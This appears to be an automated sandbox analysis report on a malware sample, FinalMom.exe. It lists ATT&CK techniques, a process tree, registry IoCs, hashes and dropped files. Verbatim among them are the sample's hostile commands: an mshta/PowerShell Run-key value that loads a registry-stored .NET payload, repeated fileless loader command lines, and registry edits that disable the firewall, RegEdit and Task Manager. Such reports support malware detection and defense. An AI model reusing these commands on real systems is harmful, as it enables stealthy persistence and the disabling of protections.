f213b6d73b6a7b3d90f4097e69689fa88fffe327690801ffb6992d659b981bf2

Analysis

max time kernel
141s
max time network
137s
platform
windows10-2004_x64
resource
win10v2004-20240704-en
resource tags

arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
submitted
25-07-2024 20:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FinalMom.exe
Size

270KB
MD5

4c048896f61c1fc598c9ec70adf6ee08
SHA1

fb5468fe0894a4a7728b1a388bc08963cc760118
SHA256

f213b6d73b6a7b3d90f4097e69689fa88fffe327690801ffb6992d659b981bf2
SHA512

33652027fe457dd967dad1367510db1fd0eede4415dd86b64aea9d77425e7e061b60577811e4c5e79a6cf17cba33faa52c1780934079ed527efeb7846b1dc75c
SSDEEP

6144:LGLRsWlWysINHL87yCwQx4Jw99aKGz5UBBkvVv+Iz3D5vxju7llbb9EE4N8cUMsG:LGLdlHL8W/QWJwiKluNmudUl99EE4N88

Score

10^/10

defense_evasion discovery evasion execution persistence

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe, "	RegAsm.exe

Modifies firewall policy service 3 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	RegAsm.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs

description	pid	Process	procid_target
PID 4844 created 2932	4844	powershell.exe	87
PID 4788 created 2932	4788	powershell.exe	87
PID 1468 created 2932	1468	powershell.exe	87
PID 3076 created 2932	3076	powershell.exe	87
PID 1300 created 2932	1300	powershell.exe	87
PID 3468 created 2932	3468	powershell.exe	87
PID 4932 created 2932	4932	powershell.exe	87
PID 1476 created 2932	1476	powershell.exe	87
PID 4968 created 2932	4968	powershell.exe	87

Disables RegEdit via registry modification 1 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	RegAsm.exe

Disables Task Manager via registry modification
evasion

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	RegAsm.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation	FinalMom.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation	RegAsm.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "mshta \"javascript:close(new ActiveXObject('WScript.Shell').run('powershell \\\"[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey(\\\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\").GetValue($Null)).EntryPoint.Invoke(0,$Null)\\\"',0))\""	FinalMom.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3076	powershell.exe
1468	powershell.exe
4932	powershell.exe
1300	powershell.exe
4788	powershell.exe
4844	powershell.exe
4968	powershell.exe
1476	powershell.exe
3468	powershell.exe

Indicator Removal: Clear Persistence 1 TTPs 1 IoCs

Clear artifacts associated with previously established persistence like scheduletasks on a host.

defense_evasion

Clear Persistence

T1070.009

pid	Process
736	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
13	raw.githubusercontent.com
18	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
35	icanhazip.com

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1468 set thread context of 4736	1468	powershell.exe	112
PID 3468 set thread context of 3324	3468	powershell.exe	116
PID 1300 set thread context of 1960	1300	powershell.exe	118

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jsc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jsc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FinalMom.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
2264	timeout.exe
3684	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
3736	taskkill.exe

Suspicious behavior: EnumeratesProcesses 45 IoCs

pid	Process
4788	powershell.exe
4788	powershell.exe
4844	powershell.exe
4844	powershell.exe
1468	powershell.exe
1468	powershell.exe
3076	powershell.exe
3076	powershell.exe
4932	powershell.exe
4932	powershell.exe
1300	powershell.exe
1300	powershell.exe
1476	powershell.exe
1476	powershell.exe
3468	powershell.exe
3468	powershell.exe
4968	powershell.exe
4968	powershell.exe
4788	powershell.exe
1468	powershell.exe
4844	powershell.exe
3076	powershell.exe
4932	powershell.exe
1300	powershell.exe
1476	powershell.exe
3468	powershell.exe
4968	powershell.exe
4844	powershell.exe
4844	powershell.exe
4788	powershell.exe
4788	powershell.exe
1468	powershell.exe
1468	powershell.exe
3076	powershell.exe
3076	powershell.exe
1300	powershell.exe
1300	powershell.exe
3468	powershell.exe
3468	powershell.exe
4932	powershell.exe
4932	powershell.exe
1476	powershell.exe
1476	powershell.exe
4968	powershell.exe
4968	powershell.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

description	pid	Process
Token: SeDebugPrivilege	5064	FinalMom.exe
Token: SeDebugPrivilege	1468	powershell.exe
Token: SeDebugPrivilege	4788	powershell.exe
Token: SeDebugPrivilege	4844	powershell.exe
Token: SeDebugPrivilege	3076	powershell.exe
Token: SeDebugPrivilege	1300	powershell.exe
Token: SeDebugPrivilege	4932	powershell.exe
Token: SeDebugPrivilege	1476	powershell.exe
Token: SeDebugPrivilege	3468	powershell.exe
Token: SeDebugPrivilege	4968	powershell.exe
Token: SeDebugPrivilege	4736	RegAsm.exe
Token: SeDebugPrivilege	4736	RegAsm.exe
Token: SeDebugPrivilege	4736	RegAsm.exe
Token: SeDebugPrivilege	4736	RegAsm.exe
Token: SeDebugPrivilege	4736	RegAsm.exe
Token: SeDebugPrivilege	3736	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5064 wrote to memory of 4788	5064	FinalMom.exe	89
PID 5064 wrote to memory of 4788	5064	FinalMom.exe	89
PID 5064 wrote to memory of 4788	5064	FinalMom.exe	89
PID 5064 wrote to memory of 4844	5064	FinalMom.exe	91
PID 5064 wrote to memory of 4844	5064	FinalMom.exe	91
PID 5064 wrote to memory of 4844	5064	FinalMom.exe	91
PID 5064 wrote to memory of 3076	5064	FinalMom.exe	93
PID 5064 wrote to memory of 3076	5064	FinalMom.exe	93
PID 5064 wrote to memory of 3076	5064	FinalMom.exe	93
PID 5064 wrote to memory of 1468	5064	FinalMom.exe	95
PID 5064 wrote to memory of 1468	5064	FinalMom.exe	95
PID 5064 wrote to memory of 1468	5064	FinalMom.exe	95
PID 5064 wrote to memory of 4932	5064	FinalMom.exe	97
PID 5064 wrote to memory of 4932	5064	FinalMom.exe	97
PID 5064 wrote to memory of 4932	5064	FinalMom.exe	97
PID 5064 wrote to memory of 1300	5064	FinalMom.exe	99
PID 5064 wrote to memory of 1300	5064	FinalMom.exe	99
PID 5064 wrote to memory of 1300	5064	FinalMom.exe	99
PID 5064 wrote to memory of 4968	5064	FinalMom.exe	100
PID 5064 wrote to memory of 4968	5064	FinalMom.exe	100
PID 5064 wrote to memory of 4968	5064	FinalMom.exe	100
PID 5064 wrote to memory of 1476	5064	FinalMom.exe	102
PID 5064 wrote to memory of 1476	5064	FinalMom.exe	102
PID 5064 wrote to memory of 1476	5064	FinalMom.exe	102
PID 5064 wrote to memory of 3468	5064	FinalMom.exe	103
PID 5064 wrote to memory of 3468	5064	FinalMom.exe	103
PID 5064 wrote to memory of 3468	5064	FinalMom.exe	103
PID 5064 wrote to memory of 2880	5064	FinalMom.exe	106
PID 5064 wrote to memory of 2880	5064	FinalMom.exe	106
PID 5064 wrote to memory of 2880	5064	FinalMom.exe	106
PID 2880 wrote to memory of 4428	2880	cmd.exe	109
PID 2880 wrote to memory of 4428	2880	cmd.exe	109
PID 2880 wrote to memory of 4428	2880	cmd.exe	109
PID 4844 wrote to memory of 3100	4844	powershell.exe	110
PID 4844 wrote to memory of 3100	4844	powershell.exe	110
PID 4844 wrote to memory of 3100	4844	powershell.exe	110
PID 4788 wrote to memory of 3928	4788	powershell.exe	111
PID 4788 wrote to memory of 3928	4788	powershell.exe	111
PID 4788 wrote to memory of 3928	4788	powershell.exe	111
PID 1468 wrote to memory of 4736	1468	powershell.exe	112
PID 1468 wrote to memory of 4736	1468	powershell.exe	112
PID 1468 wrote to memory of 4736	1468	powershell.exe	112
PID 1468 wrote to memory of 4736	1468	powershell.exe	112
PID 1468 wrote to memory of 4736	1468	powershell.exe	112
PID 1468 wrote to memory of 4736	1468	powershell.exe	112
PID 1468 wrote to memory of 4736	1468	powershell.exe	112
PID 1468 wrote to memory of 4736	1468	powershell.exe	112
PID 3076 wrote to memory of 796	3076	powershell.exe	113
PID 3076 wrote to memory of 796	3076	powershell.exe	113
PID 3076 wrote to memory of 796	3076	powershell.exe	113
PID 4932 wrote to memory of 2452	4932	powershell.exe	114
PID 4932 wrote to memory of 2452	4932	powershell.exe	114
PID 4932 wrote to memory of 2452	4932	powershell.exe	114
PID 1476 wrote to memory of 3056	1476	powershell.exe	115
PID 1476 wrote to memory of 3056	1476	powershell.exe	115
PID 1476 wrote to memory of 3056	1476	powershell.exe	115
PID 3468 wrote to memory of 3324	3468	powershell.exe	116
PID 3468 wrote to memory of 3324	3468	powershell.exe	116
PID 3468 wrote to memory of 3324	3468	powershell.exe	116
PID 4968 wrote to memory of 3456	4968	powershell.exe	117
PID 4968 wrote to memory of 3456	4968	powershell.exe	117
PID 4968 wrote to memory of 3456	4968	powershell.exe	117
PID 1300 wrote to memory of 1960	1300	powershell.exe	118
PID 1300 wrote to memory of 1960	1300	powershell.exe	118

C:\Users\Admin\AppData\Local\Temp\FinalMom.exe
"C:\Users\Admin\AppData\Local\Temp\FinalMom.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5064
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey(\"Software\\Microsoft\\Windows\").GetValue($Null)).EntryPoint.Invoke(0,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4788
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey(\"Software\\Microsoft\\Windows\").GetValue($Null)).EntryPoint.Invoke(0,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4844
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey(\"Software\\Microsoft\\Windows\").GetValue($Null)).EntryPoint.Invoke(0,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3076
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey(\"Software\\Microsoft\\Windows\").GetValue($Null)).EntryPoint.Invoke(0,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1468
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey(\"Software\\Microsoft\\Windows\").GetValue($Null)).EntryPoint.Invoke(0,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4932
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey(\"Software\\Microsoft\\Windows\").GetValue($Null)).EntryPoint.Invoke(0,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1300
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey(\"Software\\Microsoft\\Windows\").GetValue($Null)).EntryPoint.Invoke(0,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4968
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey(\"Software\\Microsoft\\Windows\").GetValue($Null)).EntryPoint.Invoke(0,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1476
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey(\"Software\\Microsoft\\Windows\").GetValue($Null)).EntryPoint.Invoke(0,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3468
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE5AD.tmp.bat""
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2880
- - C:\Windows\SysWOW64\chcp.com
    chcp 65001
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4428
- - C:\Windows\SysWOW64\timeout.exe
    timeout 2
    3⤵
    - System Location Discovery: System Language Discovery
    - Delays execution with timeout.exe
    PID:2264

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2932
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  PID:3100
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  PID:3928
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  - Modifies WinLogon for persistence
  - Modifies firewall policy service
  - Disables RegEdit via registry modification
  - Drops file in Drivers directory
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:4736
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /delete /tn "-"
    3⤵
    - Indicator Removal: Clear Persistence
    - System Location Discovery: System Language Discovery
    PID:736
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /delete /tn "-"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3108
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM wscript.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2932
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM wscript.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3736
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA85C.tmp.bat""
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2432
  - - C:\Windows\SysWOW64\chcp.com
      chcp 65001
      4⤵
      System Location Discovery: System Language Discovery
      PID:4180
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 5
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:3684
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
  2⤵
  PID:796
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
  2⤵
  PID:2452
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
  2⤵
  PID:3056
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3324
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  PID:3456
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1960

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

Clear Persistence

T1070.009

Modify Registry

T1112

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jsc.exe.log

Filesize
609B

MD5
d12b2202c8663de63120a7239216f4c9

SHA1
f0263381d735e0d3a029378de06e6c49f386bb4f

SHA256
a1523cbbb1efe7eaed779caf6077a067519945accb1ab61a4c39323fffea6e5d

SHA512
942e728bb334cd3a7c634617c04cc2848124505a7a5b3f3081e5d46334e313b1f6fbf854e94d4f44dd51692c39cd19d239b15de3f0aa443ebd8d60db2868ab80

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
28854213fdaa59751b2b4cfe772289cc

SHA1
fa7058052780f4b856dc2d56b88163ed55deb6ab

SHA256
7c65fe71d47e0de69a15b95d1ee4b433c07a1d6f00f37dd32aee3666bb84a915

SHA512
1e2c928242bdef287b1e8afe8c37427cfd3b7a83c37d4e00e45bcbaa38c9b0bf96f869a062c9bc6bb58ecd36e687a69b21d5b07803e6615a9b632922c1c5ace4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
5f81cf7875556ddb9efd075ce22301ce

SHA1
9aa98b8f704263f75e7d92a6b065f3492ca123d2

SHA256
6ef0f3d4452615a2fc5b31d3ecf3882f30aafbc64749e7df8f713529c901ecd4

SHA512
16eb6a214a6fd8b61eded3fbae7e36cadbf036fa692960cbd1f4195bc3e94af6c94f1509c2c8a6e0522492e1548a2f240e09d442f3921936380fa0a922bf6928

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
865764e00fa83f527ac177b3ccbb4973

SHA1
a440036d1101b88d8925f2f0fc9dbd43f0d38d81

SHA256
ad853ca8355b65dbdff4515212aea230b484e0d386535120b92fef30b5d73b3f

SHA512
e0b4aa29105c743d40553e7a3bf5c9d73fd97fa008b3a15a572d442e2d97455409621cb4e613ef163b52fba7acf1bc568cb751fdc9789b3a3f85d2c39bb47562

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r2fs02ge.1c3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpA85C.tmp.bat

Filesize
178B

MD5
24d18627bc1d4944e53b07c4df0c3be4

SHA1
695d4afeca482ed24e0e7e761d7037cb64d28b31

SHA256
5f6395c9225e80c4e9c98a87e8ed99840aedf592e1053b8ef6f284a0dee72a15

SHA512
e03dd0a76a70ebc3ff88067a50b81c204bfc52e1ac01ece8d23dc97e43614b2da38201bda15486016ccc8e87122c3ade601ac42c3c01bfcee823ece2e820a9a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpE5AD.tmp.bat

Filesize
168B

MD5
b95073bfed82b24758c31d0ba5f9f37d

SHA1
d4fa416a3385058cf8b76afdfb9d7afedc7849c4

SHA256
800fee783cacca841470f5541558791b1f575419a922d76dc4c17117728d7b62

SHA512
990dc7036d14fc3f1d9b456632f42562568a03a73b779eb5f86a9b9c88e014310f19cc3e9106001c520b698616a7225941c0a2dadf83f3eda5618ee030480590

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
d240f3c8f1dd3f1b7744fb0b4461f381

SHA1
d73516a7b1336b4a75b1d0d2345152ba81241b16

SHA256
f3bdaeeabe30cd6749ba5e1c3409835e6498ffbd1d973dd757d32d41b84fc55d

SHA512
a12f2e4c29c1db01b937fd9d2922445c97227038467dac3591cfb5a93f19dc095d1f34e0f4f8b2401334ac6dbd282e3250e5b01e1111536c240637acd7e2de2d

Download Submit
memory/1468-15-0x0000000004F40000-0x0000000004F62000-memory.dmp

Filesize
136KB

Download
memory/1468-16-0x00000000050E0000-0x0000000005146000-memory.dmp

Filesize
408KB

Download
memory/1468-27-0x00000000058F0000-0x0000000005C44000-memory.dmp

Filesize
3.3MB

Download
memory/4736-106-0x0000000005140000-0x00000000051D2000-memory.dmp

Filesize
584KB

Download
memory/4736-105-0x0000000005650000-0x0000000005BF4000-memory.dmp

Filesize
5.6MB

Download
memory/4736-104-0x0000000000400000-0x0000000000454000-memory.dmp

Filesize
336KB

Download
memory/4736-164-0x0000000007050000-0x000000000705A000-memory.dmp

Filesize
40KB

Download
memory/4736-165-0x0000000008C90000-0x0000000008D2C000-memory.dmp

Filesize
624KB

Download
memory/4788-6-0x0000000074520000-0x0000000074CD0000-memory.dmp

Filesize
7.7MB

Download
memory/4788-8-0x0000000074520000-0x0000000074CD0000-memory.dmp

Filesize
7.7MB

Download
memory/4788-100-0x0000000005BC0000-0x0000000005BDE000-memory.dmp

Filesize
120KB

Download
memory/4788-5-0x0000000000E20000-0x0000000000E56000-memory.dmp

Filesize
216KB

Download
memory/4788-113-0x0000000074520000-0x0000000074CD0000-memory.dmp

Filesize
7.7MB

Download
memory/4788-101-0x0000000006130000-0x000000000617C000-memory.dmp

Filesize
304KB

Download
memory/4788-7-0x0000000004EC0000-0x00000000054E8000-memory.dmp

Filesize
6.2MB

Download
memory/4844-102-0x0000000006100000-0x0000000006150000-memory.dmp

Filesize
320KB

Download
memory/4844-14-0x0000000074520000-0x0000000074CD0000-memory.dmp

Filesize
7.7MB

Download
memory/4844-12-0x0000000074520000-0x0000000074CD0000-memory.dmp

Filesize
7.7MB

Download
memory/4844-112-0x0000000074520000-0x0000000074CD0000-memory.dmp

Filesize
7.7MB

Download
memory/5064-0-0x000000007452E000-0x000000007452F000-memory.dmp

Filesize
4KB

Download
memory/5064-13-0x0000000074520000-0x0000000074CD0000-memory.dmp

Filesize
7.7MB

Download
